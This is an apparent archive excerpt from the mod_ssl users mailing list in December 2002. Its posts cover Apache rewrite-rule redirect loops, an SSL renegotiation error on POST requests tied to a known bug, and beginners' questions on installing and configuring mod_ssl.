> > attachments is
> > > confidential and may be legally privileged. If you are not the
> > > intended recipient you are hereby notified that you must not use,
> > > disclose, distribute, copy, print or rely on this email's
> > content. If
> > > you are not the intended recipient, please notify the sender
> > > immediately and then delete the email and any attachments from your
> > > system.
> > >
> > > RNIB has made strenuous efforts to ensure that emails and any
> > > attachments generated by its staff are free from viruses.
> > However, it
> > > cannot accept any responsibility for any viruses which are
> > > transmitted. We therefore recommend you scan all attachments.
> > >
> > > Please note that the statements and views expressed in this email
> > > and any attachments are those of the author and do not necessarily
> > > represent those of RNIB.
> > >
> > > RNIB Registered Charity Number: 226227
> > >
> > > Website: http://www.rnib.org.uk
> > >
> > ______________________________________________________________________
> > > Apache Interface to OpenSSL (mod_ssl)
> > www.modssl.org
> > > User Support Mailing List
> > modssl-users@modssl.org
> > > Automated List Manager
> > majordomo@modssl.org
> > >
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
>
> -
>
> NOTICE: The information contained in this email and any attachments is
> confidential and may be legally privileged. If you are not the
> intended recipient you are hereby notified that you must not use,
> disclose, distribute, copy, print or rely on this email's content. If
> you are not the intended recipient, please notify the sender
> immediately and then delete the email and any attachments from your
> system.
>
> RNIB has made strenuous efforts to ensure that emails and any
> attachments generated by its staff are free from viruses. However, it
> cannot accept any responsibility for any viruses which are
> transmitted. We therefore recommend you scan all attachments.
>
> Please note that the statements and views expressed in this email
> and any attachments are those of the author and do not necessarily
> represent those of RNIB.
>
> RNIB Registered Charity Number: 226227
>
> Website: http://www.rnib.org.uk
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 18 14:27:11 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 415FA2AA085; Wed, 18 Dec 2002 14:27:11 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail1.rdcss.com (dsl-66-112-64-104.spt.customer.centurytel.net [66.112.64.104])
	by master.modssl.org (Postfix) with ESMTP id 8F0142AA081
	for ; Wed, 18 Dec 2002 14:27:09 +0100 (CET)
Received: from me (unknown [192.168.0.5])
	by mail1.rdcss.com (Postfix) with ESMTP id 8C0E71B932
	for ; Wed, 18 Dec 2002 07:27:07 -0600 (CST)
Message-ID: <006401c2a697$bd4b5ae0$0500a8c0@rdcss.com>
From: 
To: 
References: 
Subject: Re: Ilya Birman/US/ABNAMRO/NL is out of the office.
Date: Wed, 18 Dec 2002 07:16:56 -0600
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: base64
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

c2hvdWxkIHdlIGFsbCBjb250YWN0IHRoZW0/Pw0KDQpNZXJyeSBDaHJpc3RtYXMhDQotLS0tLSBP
cmlnaW5hbCBNZXNzYWdlIC0tLS0tIA0KRnJvbTogPGlseWEuYmlybWFuQGFibmFtcm8uY29tPg0K
VG86IDxtb2Rzc2wtdXNlcnNAbW9kc3NsLm9yZz4NClNlbnQ6IFdlZG5lc2RheSwgRGVjZW1iZXIg
MTgsIDIwMDIgMToxMSBBTQ0KU3ViamVjdDogSWx5YSBCaXJtYW4vVVMvQUJOQU1STy9OTCBpcyBv
dXQgb2YgdGhlIG9mZmljZS4NCg0KDQo+IEkgd2lsbCBiZSBvdXQgb2YgdGhlIG9mZmljZSBzdGFy
dGluZyAgMTIvMTcvMjAwMiBhbmQgd2lsbCBub3QgcmV0dXJuIHVudGlsDQo+IDAxLzA4LzIwMDMu
DQo+IA0KPiBJIGFtIG91dCBvZiB0aGUgb2ZmaWNlIG9uIHZhY2F0aW9uIGZyb20gRGVjIDE3LCAy
MDAyLCByZXR1cm5pbmcNCj4gSmFudWFyeSA4LCAyMDAzLg0KPiBJbiBjYXNlIG9mIGVtZXJnZW5j
eSBwbGVhc2UgY29udGFjdCBVTklYIHNoaWZ0IHBhZ2VyIGF0DQo+IDE1NjI2MzZAd29ybGRjb20u
Y29tDQo+IElseWEuDQo+IA0KPiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4gVGhpcyBtZXNzYWdlIChp
bmNsdWRpbmcgYW55IGF0dGFjaG1lbnRzKSBpcyBjb25maWRlbnRpYWwgYW5kIG1heSBiZQ0KPiBw
cml2aWxlZ2VkLiBJZiB5b3UgaGF2ZSByZWNlaXZlZCBpdCBieSBtaXN0YWtlIHBsZWFzZSBub3Rp
ZnkgdGhlIHNlbmRlciBieQ0KPiByZXR1cm4gZS1tYWlsIGFuZCBkZWxldGUgdGhpcyBtZXNzYWdl
IGZyb20geW91ciBzeXN0ZW0uIEFueSB1bmF1dGhvcmlzZWQNCj4gdXNlIG9yIGRpc3NlbWluYXRp
b24gb2YgdGhpcyBtZXNzYWdlIGluIHdob2xlIG9yIGluIHBhcnQgaXMgc3RyaWN0bHkNCj4gcHJv
aGliaXRlZC4gUGxlYXNlIG5vdGUgdGhhdCBlLW1haWxzIGFyZSBzdXNjZXB0aWJsZSB0byBjaGFu
Z2UuDQo+IEFCTiBBTVJPIEJhbmsgTi5WLiAoaW5jbHVkaW5nIGl0cyBncm91cCBjb21wYW5pZXMp
IHNoYWxsIG5vdCBiZSBsaWFibGUgZm9yDQo+IHRoZSBpbXByb3BlciBvciBpbmNvbXBsZXRlIHRy
YW5zbWlzc2lvbiBvZiB0aGUgaW5mb3JtYXRpb24gY29udGFpbmVkIGluDQo+IHRoaXMgY29tbXVu
aWNhdGlvbiBub3IgZm9yIGFueSBkZWxheSBpbiBpdHMgcmVjZWlwdCBvciBkYW1hZ2UgdG8geW91
cg0KPiBzeXN0ZW0uIEFCTiBBTVJPIEJhbmsgTi5WLiAob3IgaXRzIGdyb3VwIGNvbXBhbmllcykg
ZG9lcyBub3QgZ3VhcmFudGVlIHRoYXQNCj4gdGhlIGludGVncml0eSBvZiB0aGlzIGNvbW11bmlj
YXRpb24gaGFzIGJlZW4gbWFpbnRhaW5lZCBub3IgdGhhdCB0aGlzDQo+IGNvbW11bmljYXRpb24g
aXMgZnJlZSBvZiB2aXJ1c2VzLCBpbnRlcmNlcHRpb25zIG9yIGludGVyZmVyZW5jZS4NCj4gLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tDQo+IA0KPiANCj4gDQo+IA0KPiBfX19fX19fX19fX19fX19fX19fX19f
X19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fX19fDQo+IEFwYWNo
ZSBJbnRlcmZhY2UgdG8gT3BlblNTTCAobW9kX3NzbCkgICAgICAgICAgICAgICAgICAgd3d3Lm1v
ZHNzbC5vcmcNCj4gVXNlciBTdXBwb3J0IE1haWxpbmcgTGlzdCAgICAgICAgICAgICAgICAgICAg
ICBtb2Rzc2wtdXNlcnNAbW9kc3NsLm9yZw0KPiBBdXRvbWF0ZWQgTGlzdCBNYW5hZ2VyICAgICAg
ICAgICAgICAgICAgICAgICAgICAgIG1ham9yZG9tb0Btb2Rzc2wub3Jn

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 18 15:41:57 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 185D62AA086; Wed, 18 Dec 2002 15:41:57 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id C32852AA084; Wed, 18 Dec 2002 15:41:56 +0100 (CET)
Received: from relais1.stna.aviation-civile.gouv.fr (relais1.stna.aviation-civile.gouv.fr [143.196.161.40])
	by master.modssl.org (Postfix) with ESMTP id 0DFDF2AA083
	for ; Tue, 17 Dec 2002 10:08:21 +0100 (CET)
Received: by relais1.stna.aviation-civile.gouv.fr (MTA server DGAC - STNA, from userid 0)
	id 052736F22F; Tue, 17 Dec 2002 10:08:20 +0100 (CET)
Received: from cranberries.stna.dgac.fr (localhost.localdomain [127.0.0.1])
	by relais1.stna.aviation-civile.gouv.fr (MTA server DGAC - STNA) with ESMTP id AB7417712E
	for ; Tue, 17 Dec 2002 10:08:19 +0100 (CET)
Subject: RE: Mod_ssl  and apache 2.0.40
To: modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.07a  May 14, 2001
Message-ID: 
From: francoise.tukalo@aviation-civile.gouv.fr
Date: Tue, 17 Dec 2002 10:08:16 +0100
X-MIMETrack: Serialize by Router on CS-SUD/DGAC(Release 5.07a |May 14, 2001) at 17/12/2002
 10:06:14
MIME-Version: 1.0
Content-type: text/plain; charset=iso-8859-1
Content-transfer-encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: francoise.tukalo@aviation-civile.gouv.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Sorry, I have a mistake in configuration in reality the directives in
ssl.conf are :
>

RewriteEngine        on
RewriteCond %{HTTPS} !=3Don
RewriteRule ^/home/httpd/html/telechargement/(.*)$
https://%{SERVER_NAME}/telechargement/$1 [R,L]


I test http://machine.site/telechargement/fichier.htmlwriteEngine      =
  on

In reality, i have several questions :
Why http_2.0.40 loops and why apache_1.3.27 doesn't loop?
ANd why the server see the url  that I am testing
http://machine.site/telechargement/fichier.html like
/home/httpd/html/telechargement/fichier.html

Perhaps it's idiot question but i'd like someone answer this.

Thanks.

Fran=E7oise TUKALO
STNA  8IS
Tel  : 05 62 14 53 95
Fax : 05 62 14 54 02
email : francoise.tukalo@aviation-civile.gouv.fr=


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 18 15:43:01 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 2361D2AA085; Wed, 18 Dec 2002 15:43:01 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: by master.modssl.org (Postfix, from userid 4000)
	id B49FA2AA0AA; Wed, 18 Dec 2002 15:43:00 +0100 (CET)
Received: from thoth.sbs.de (thoth.sbs.de [192.35.17.2])
	by master.modssl.org (Postfix) with ESMTP id 222F42AA078
	for ; Tue, 17 Dec 2002 17:49:13 +0100 (CET)
Received: from mail1.siemens.de (mail1.siemens.de [139.23.33.14])
	by thoth.sbs.de (8.11.6/8.11.6) with ESMTP id gBHGnCi18243
	for ; Tue, 17 Dec 2002 17:49:12 +0100 (MET)
Received: from mchp9daa.mch.sbs.de (mchp9daa.mch.sbs.de [139.25.137.99])
	by mail1.siemens.de (8.11.6/8.11.6) with ESMTP id gBHGnCc20802
	for ; Tue, 17 Dec 2002 17:49:12 +0100 (MET)
Received: by mchp9daa.mch.sbs.de with Internet Mail Service (5.5.2653.19)
	id ; Tue, 17 Dec 2002 17:49:11 +0100
Message-ID: 
From: Moeller Wolf-Dietrich 
To: modssl-users@modssl.org
Subject: RE: POST with mod_ssl intermittently fails with a 405
Date: Tue, 17 Dec 2002 17:49:11 +0100
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Moeller Wolf-Dietrich 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This error might be related to bug
http://nagoya.apache.org/bugzilla/show_bug.cgi?id=3D12355
 ,
as your error message
> > >	[Tue Dec 17 15:48:08 2002] [error] SSL Re-negotiation
> > >in conjunction with POST method not supported!
> > >	hint: try SSLOptions +OptRenegotiate
suggests.

My interpretation (not sure).
On an existing SSL connection (established with a GET request), =
subsequent
POSTs are possible.
But after timeout of this connection, if the first request for the new
establishment of connection is POST, it sometimes (or always?) fails.
Therefor the intermittend error only.

You can produce this error always, if you do "Verify client" for single
directories only, not for the whole server.

By the way: The hint with +OptRenegotiate does not help for the above =
bug.

Hope it helps.
Wolf

----------------------------------------
Dr. Wolf-Dietrich Moeller
Siemens AG, CT IC 3, D-81730 M=FCnchen
Corporate Technology Department Security
Mch P, Tel. +49 89 636-53391, Fax -48000
mailto:HYPERLINK
"mailto:wolf-dietrich.moeller@siemens.com"wolf-dietrich.moeller@siemens.=
com
=20
Intranet https://security.ct.siemens.de/ =
=20


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 18 16:15:16 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 01F342AA085; Wed, 18 Dec 2002 16:15:15 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from GATE2.retail-sc.com (ns.rscweb.net [195.127.175.210])
	by master.modssl.org (Postfix) with ESMTP id 2CD5C2AA081
	for ; Wed, 18 Dec 2002 16:15:14 +0100 (CET)
Received: from mambox.intdus.retail-sc.com (IDENT:root@mambox.intdus.retail-sc.com [10.0.12.1])
	by GATE2.retail-sc.com (8.9.3/8.9.3) with ESMTP id QAA16857
	for ; Wed, 18 Dec 2002 16:14:02 +0100
Received: from mambox.intdus.retail-sc.com (IDENT:jpm@mambox.intdus.retail-sc.com [10.0.12.1])
	by mambox.intdus.retail-sc.com (8.9.1/8.9.1) with ESMTP id QAA07353
	for ; Wed, 18 Dec 2002 16:14:01 +0100
Date: Wed, 18 Dec 2002 16:14:01 +0100 (CET)
From: Jan-Piet Mens 
To: modssl-users@modssl.org
Subject: RE: POST with mod_ssl intermittently fails with a 405
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=iso-8859-1
Content-Transfer-Encoding: QUOTED-PRINTABLE
X-G2-MailScanner: Found to be clean
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jan-Piet Mens 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thank you, Wolf-Dietrich! You are right. The bug documents my problem
exactly. I'm disappointed that there seems to be no solution...

Regards,
=09-JP


On Tue, 17 Dec 2002, Moeller Wolf-Dietrich wrote:

> This error might be related to bug
> http://nagoya.apache.org/bugzilla/show_bug.cgi?id=3D12355
>  ,
> as your error message
> > > >=09[Tue Dec 17 15:48:08 2002] [error] SSL Re-negotiation
> > > >in conjunction with POST method not supported!
> > > >=09hint: try SSLOptions +OptRenegotiate
> suggests.
>
> My interpretation (not sure).
> On an existing SSL connection (established with a GET request), subsequen=
t
> POSTs are possible.
> But after timeout of this connection, if the first request for the new
> establishment of connection is POST, it sometimes (or always?) fails.
> Therefor the intermittend error only.
>
> You can produce this error always, if you do "Verify client" for single
> directories only, not for the whole server.
>
> By the way: The hint with +OptRenegotiate does not help for the above bug=
=2E
>
> Hope it helps.
> Wolf
>
> ----------------------------------------
> Dr. Wolf-Dietrich Moeller
> Siemens AG, CT IC 3, D-81730 M=FCnchen
> Corporate Technology Department Security
> Mch P, Tel. +49 89 636-53391, Fax -48000
> mailto:HYPERLINK
> "mailto:wolf-dietrich.moeller@siemens.com"wolf-dietrich.moeller@siemens.c=
om
> 
> Intranet https://security.ct.siemens.de/ 
>
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 18 19:11:00 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0B28A2AA085; Wed, 18 Dec 2002 19:11:00 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from smtp03.mrf.mail.rcn.net (smtp03.mrf.mail.rcn.net [207.172.4.62])
	by master.modssl.org (Postfix) with ESMTP id 1ACE72AA081
	for ; Wed, 18 Dec 2002 19:10:54 +0100 (CET)
X-Info: This message was accepted for relay by
	smtp03.mrf.mail.rcn.net as the sender used SMTP authentication
X-Trace: UmFuZG9tSVZJOcG8w+Gr/v7XYRpGu2A49k050D3jZgYcwpElNCX1kcG5zz41CyRnB+6O1uM08aQ=
Received: from r-64-105-199-201.mclnva23.covad.net ([64.105.199.201] helo=ccs4)
	by smtp03.mrf.mail.rcn.net with asmtp (Exim 3.35 #4)
	id 18Oiei-0000Fd-00
	for modssl-users@modssl.org; Wed, 18 Dec 2002 13:10:52 -0500
Message-ID: <03a201c2a6c0$bba9e340$6b01a8c0@ccsllc.com>
From: "Dawn Sun" 
To: 
References: 
Subject: win32 binary build question
Date: Wed, 18 Dec 2002 13:10:22 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Dawn Sun" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I am new to Apache. I have a window 2000 and want to install apache with
SSL. I found the
http://tor.ath.cx/~hunter/apache/Apache_2.0.43-OpenSSL_0.9.6g-Win32.zip from
Hunter's site (thanks to Hunter). I've configured the httpd.conf and
ssl.conf. I got the security cert as well.

After I started the apache(bin\apache -k start), the server started fine
without error(no error in error log), but the HTTPS failed when I tried to
retrieve pages from HTTPS. I think something maybe wrong in my ssl.conf.

Can someone give suggestions or provide a sample ssl.conf?

Thanks a lot,

Dawn Sun


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Dec 18 19:30:57 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 00DED2AA085; Wed, 18 Dec 2002 19:30:56 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from me.homelinux.net (cmb3-218.dial-up.arnes.si [194.249.40.218])
	by master.modssl.org (Postfix) with ESMTP id 0320C2AA081
	for ; Wed, 18 Dec 2002 19:30:54 +0100 (CET)
Received: from Spooler by me.homelinux.net (Mercury/32 v3.32) ID MO000099;
    18 Dec 02 19:30:46 +0100
Received: from spooler by me.homelinux.net (Mercury/32 v3.32); 18 Dec 02 19:30:37 +0100
Received: from stupar.homelinux.net (192.168.10.1) by 194.249.40.218 (Mercury/32 v3.32) with ESMTP ID MG000098;
   18 Dec 02 19:30:23 +0100
Message-ID: <3E00BEC6.8020803@stupar.homelinux.net>
Date: Wed, 18 Dec 2002 19:30:30 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; fr-FR; rv:1.0.2) Gecko/20021120 Netscape/7.01
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Redirection
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms020400030300000308010207"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sasa STUPAR 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a cryptographically signed message in MIME format.

--------------ms020400030300000308010207
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit

Hi !

I have set up Apache 2.0.43+mod_ssl and it is working fine. Now I would 
like to redirect all request for http://myserver to https://myserver-ssl 
but with option Redirect I don't get by - it tells me that there is to 
many relays or something like this. I have looked for mod_revrite but 
since I am a newbie I don't understand what should I do with it.
Can anyone help me with this, please ?

Sasa

--------------ms020400030300000308010207
Content-Type: application/x-pkcs7-signature; name="smime.p7s"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="smime.p7s"
Content-Description: S/MIME Cryptographic Signature

MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIEzjCC
AmMwggHMAgECMA0GCSqGSIb3DQEBBAUAMIGBMQswCQYDVQQGEwJTSTERMA8GA1UECBMIU2xv
dmVuaWExEDAOBgNVBAcTB01hcmlib3IxHTAbBgNVBAMTFHN0dXBhci5ob21lbGludXgubmV0
MS4wLAYJKoZIhvcNAQkBFh9wb3N0bWFzdGVyQHN0dXBhci5ob21lbGludXgubmV0MB4XDTAy
MTIxMjExMzY0OVoXDTAzMTIxMjExMzY0OVowcjELMAkGA1UEBhMCU0kxETAPBgNVBAgTCFNs
b3ZlbmlhMRAwDgYDVQQHEwdNYXJpYm9yMRQwEgYDVQQDEwtTYXNhIFNUVVBBUjEoMCYGCSqG
SIb3DQEJARYZc2FzYUBzdHVwYXIuaG9tZWxpbnV4Lm5ldDCBnzANBgkqhkiG9w0BAQEFAAOB
jQAwgYkCgYEAuPDzDL2oxWDqfSyIGvjH7JQTcF+Dn6tM6O2D4IGrgQK2MfAJXcd+AaMlwyGq
P3sND4BNo5mgsz7XyTjddvfRaste6UIUDnsbNlUQI+GApPHAoeiBTt7rWbkSYsllVPn3nS1t
indhZIiKWSbDfTRAOxz9Vk1dwmj9L7LoB8WcZ7MCAwEAATANBgkqhkiG9w0BAQQFAAOBgQBz
4fyueMI3+ORCD61BQid7JvCdCVpj7MF4lf4zh+WQpP7klV3/+8OMkLA3TK8EvDoLNeFKgbZZ
STSV6cUGuscfESGn9Kq0M9OMyNFFc/IR2qGgsohEZLa5EScodGUfOJzPlg1KNqXXaV3Aomyq
3WhJ07a2c9kwXpy/flFLlUmccDCCAmMwggHMAgECMA0GCSqGSIb3DQEBBAUAMIGBMQswCQYD
VQQGEwJTSTERMA8GA1UECBMIU2xvdmVuaWExEDAOBgNVBAcTB01hcmlib3IxHTAbBgNVBAMT
FHN0dXBhci5ob21lbGludXgubmV0MS4wLAYJKoZIhvcNAQkBFh9wb3N0bWFzdGVyQHN0dXBh
ci5ob21lbGludXgubmV0MB4XDTAyMTIxMjExMzY0OVoXDTAzMTIxMjExMzY0OVowcjELMAkG
A1UEBhMCU0kxETAPBgNVBAgTCFNsb3ZlbmlhMRAwDgYDVQQHEwdNYXJpYm9yMRQwEgYDVQQD
EwtTYXNhIFNUVVBBUjEoMCYGCSqGSIb3DQEJARYZc2FzYUBzdHVwYXIuaG9tZWxpbnV4Lm5l
dDCBnzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAuPDzDL2oxWDqfSyIGvjH7JQTcF+Dn6tM
6O2D4IGrgQK2MfAJXcd+AaMlwyGqP3sND4BNo5mgsz7XyTjddvfRaste6UIUDnsbNlUQI+GA
pPHAoeiBTt7rWbkSYsllVPn3nS1tindhZIiKWSbDfTRAOxz9Vk1dwmj9L7LoB8WcZ7MCAwEA
ATANBgkqhkiG9w0BAQQFAAOBgQBz4fyueMI3+ORCD61BQid7JvCdCVpj7MF4lf4zh+WQpP7k
lV3/+8OMkLA3TK8EvDoLNeFKgbZZSTSV6cUGuscfESGn9Kq0M9OMyNFFc/IR2qGgsohEZLa5
EScodGUfOJzPlg1KNqXXaV3Aomyq3WhJ07a2c9kwXpy/flFLlUmccDGCAoAwggJ8AgEBMIGH
MIGBMQswCQYDVQQGEwJTSTERMA8GA1UECBMIU2xvdmVuaWExEDAOBgNVBAcTB01hcmlib3Ix
HTAbBgNVBAMTFHN0dXBhci5ob21lbGludXgubmV0MS4wLAYJKoZIhvcNAQkBFh9wb3N0bWFz
dGVyQHN0dXBhci5ob21lbGludXgubmV0AgECMAkGBSsOAwIaBQCgggFOMBgGCSqGSIb3DQEJ
AzELBgkqhkiG9w0BBwEwHAYJKoZIhvcNAQkFMQ8XDTAyMTIxODE4MzAzMFowIwYJKoZIhvcN
AQkEMRYEFLinNGV3vnZkADICIP3/JAkicRuyMFIGCSqGSIb3DQEJDzFFMEMwCgYIKoZIhvcN
AwcwDgYIKoZIhvcNAwICAgCAMA0GCCqGSIb3DQMCAgFAMAcGBSsOAwIHMA0GCCqGSIb3DQMC
AgEoMIGaBgsqhkiG9w0BCRACCzGBiqCBhzCBgTELMAkGA1UEBhMCU0kxETAPBgNVBAgTCFNs
b3ZlbmlhMRAwDgYDVQQHEwdNYXJpYm9yMR0wGwYDVQQDExRzdHVwYXIuaG9tZWxpbnV4Lm5l
dDEuMCwGCSqGSIb3DQEJARYfcG9zdG1hc3RlckBzdHVwYXIuaG9tZWxpbnV4Lm5ldAIBAjAN
BgkqhkiG9w0BAQEFAASBgDIU9ORSPbyG4ADQOFVSsSL8J64DH3VH48BoEw9biCx3v53EAoWU
ngms7LNqBznN0fZ/VFqubR+/ODuxeuuwoLfjUlAdWWtWUM3BpyvBJWZ+IxCPns5tOUjygZUe
ooUULcuT3eJGLz0rw0H3LYU5VyCWEl5XroKmqsLJLdhWUIe9AAAAAAAA
--------------ms020400030300000308010207--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 19 00:25:22 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 601052AA087; Thu, 19 Dec 2002 00:25:22 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from hotmail.com (f187.law10.hotmail.com [64.4.15.187])
	by master.modssl.org (Postfix) with ESMTP id 969812AA085
	for ; Thu, 19 Dec 2002 00:25:20 +0100 (CET)
Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC;
	 Wed, 18 Dec 2002 15:15:05 -0800
Received: from 203.222.88.23 by lw10fd.law10.hotmail.msn.com with HTTP;
	Wed, 18 Dec 2002 23:15:05 GMT
X-Originating-IP: [203.222.88.23]
From: "Andrew Nelson" 
To: modssl-users@modssl.org
Subject: compiling on existing apache 1.3.27 ?
Date: Thu, 19 Dec 2002 10:15:05 +1100
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: 
X-OriginalArrivalTime: 18 Dec 2002 23:15:05.0711 (UTC) FILETIME=[4CE09FF0:01C2A6EB]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Andrew Nelson" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I had great trouble upgrading my server to Apache 1.3.27
with frontpage and PHP...  I've finally done it and now
I want to add mod_ssl to it...   In the docs, it only
describes building apache with mod_ssl from scratch - is
it easy to compile it in now?  I also noticed the directory
structure is different from the FreeBSD port - apache config
is in /usr/local/etc/apache and the rest is elsewhere.

i'd really appreciate any help,
thanks,
Andrew.

_________________________________________________________________
MSN 8 with e-mail virus protection service: 2 months FREE* 
http://join.msn.com/?page=features/virus

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 19 07:13:50 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BC5EF2AA086; Thu, 19 Dec 2002 07:13:50 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from me.homelinux.net (cmb3-218.dial-up.arnes.si [194.249.40.218])
	by master.modssl.org (Postfix) with ESMTP id A2A5B2AA078
	for ; Thu, 19 Dec 2002 07:13:48 +0100 (CET)
Received: from Spooler by me.homelinux.net (Mercury/32 v3.32) ID MO0000A9;
    19 Dec 02 07:13:37 +0100
Received: from spooler by me.homelinux.net (Mercury/32 v3.32); 19 Dec 02 07:13:25 +0100
Received: from stupar.homelinux.net (192.168.10.1) by 194.249.40.218 (Mercury/32 v3.32) with ESMTP ID MG0000A8;
   19 Dec 02 07:13:17 +0100
Message-ID: <3E016388.7060105@stupar.homelinux.net>
Date: Thu, 19 Dec 2002 07:13:28 +0100
From: Sasa STUPAR 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; fr-FR; rv:1.0.2) Gecko/20021120 Netscape/7.01
MIME-Version: 1.0
To: Modssl 
Subject: error
Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=sha1; boundary="------------ms080905070506050407040701"
